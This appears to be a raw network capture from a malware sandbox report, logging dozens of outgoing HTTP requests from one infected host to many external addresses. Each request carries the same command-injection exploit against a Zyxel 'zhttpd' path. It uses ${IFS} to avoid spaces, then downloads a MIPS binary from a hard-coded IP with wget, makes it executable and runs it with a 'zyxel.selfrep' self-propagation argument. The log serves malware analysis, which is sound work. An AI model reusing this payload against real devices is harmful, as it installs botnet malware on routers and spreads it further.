                                          Jan 14, 2024 15:46:09.841195107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2630192.168.2.2349804169.151.86.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841224909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2631192.168.2.2336548103.51.86.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841249943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2632192.168.2.235968889.178.108.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841281891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2633192.168.2.23355408.30.21.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841309071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2634192.168.2.2333034162.19.93.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841319084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2635192.168.2.23486309.37.133.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841345072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2636192.168.2.233444074.123.46.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841363907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2637192.168.2.235163290.48.57.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841398001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2638192.168.2.235871277.108.199.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841428995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2639192.168.2.235308027.44.116.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841470957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2640192.168.2.233461281.232.92.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841494083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2641192.168.2.2351060105.116.116.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841520071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2642192.168.2.2338740160.25.128.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841521025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2643192.168.2.2352042160.113.51.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841536999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2644192.168.2.2334210121.41.81.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841557026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2645192.168.2.236088267.171.45.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841598988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2646192.168.2.235677624.195.202.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841629982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2647192.168.2.2347176137.193.172.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841660976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2648192.168.2.2349434180.124.180.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841674089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2649192.168.2.2350810124.225.129.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841697931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2650192.168.2.2336916121.225.203.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841732025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2651192.168.2.233921468.30.64.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841757059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2652192.168.2.2359886171.197.231.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841794968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2653192.168.2.233318637.206.58.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841835976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2654192.168.2.233468280.125.70.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841861010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2655192.168.2.2339402105.80.123.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841901064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2656192.168.2.2342742113.40.82.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841907978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2657192.168.2.2356354162.222.188.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841938019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2658192.168.2.2344372185.164.106.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841938972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2659192.168.2.2354502222.63.148.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841960907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2660192.168.2.2358070187.114.125.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842005968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2661192.168.2.2335440153.215.105.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842036009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2662192.168.2.235412068.249.244.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842048883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2663192.168.2.235531058.31.130.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842070103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2664192.168.2.2343126128.241.43.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842108011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2665192.168.2.234754050.235.181.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842138052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2666192.168.2.2349628128.83.171.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842149973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2667192.168.2.2339656165.97.53.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842186928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2668192.168.2.2345498156.162.96.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842216969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2669192.168.2.2350596190.85.192.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842226982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2670192.168.2.2349276203.4.219.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842261076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2671192.168.2.2338758183.45.120.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842268944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2672192.168.2.233286025.221.105.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842283010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2673192.168.2.2347728146.11.125.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842295885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2674192.168.2.2354770106.2.51.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842324972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2675192.168.2.2343382213.181.53.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842375994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2676192.168.2.2338832193.150.38.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842391014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2677192.168.2.235406236.84.60.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842412949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2678192.168.2.235909835.178.76.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842448950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2679192.168.2.235130827.190.20.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842462063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2680192.168.2.2357614176.92.42.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842480898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2681192.168.2.2359078195.9.35.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842497110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2682192.168.2.2341496166.181.10.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842519999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2683192.168.2.2358056187.216.192.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842544079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2684192.168.2.2333948106.159.129.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842556953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2685192.168.2.234224671.235.149.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842597961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2686192.168.2.234768042.72.76.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842641115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2687192.168.2.2352526113.79.141.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842658043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2688192.168.2.234501476.128.22.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842664957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2689192.168.2.2332858124.173.73.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842695951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2690192.168.2.234165269.221.92.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842745066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2691192.168.2.234061450.14.32.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842761040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2692192.168.2.2355736136.124.126.146443
                                          TimestampBytes transferredDirectionData
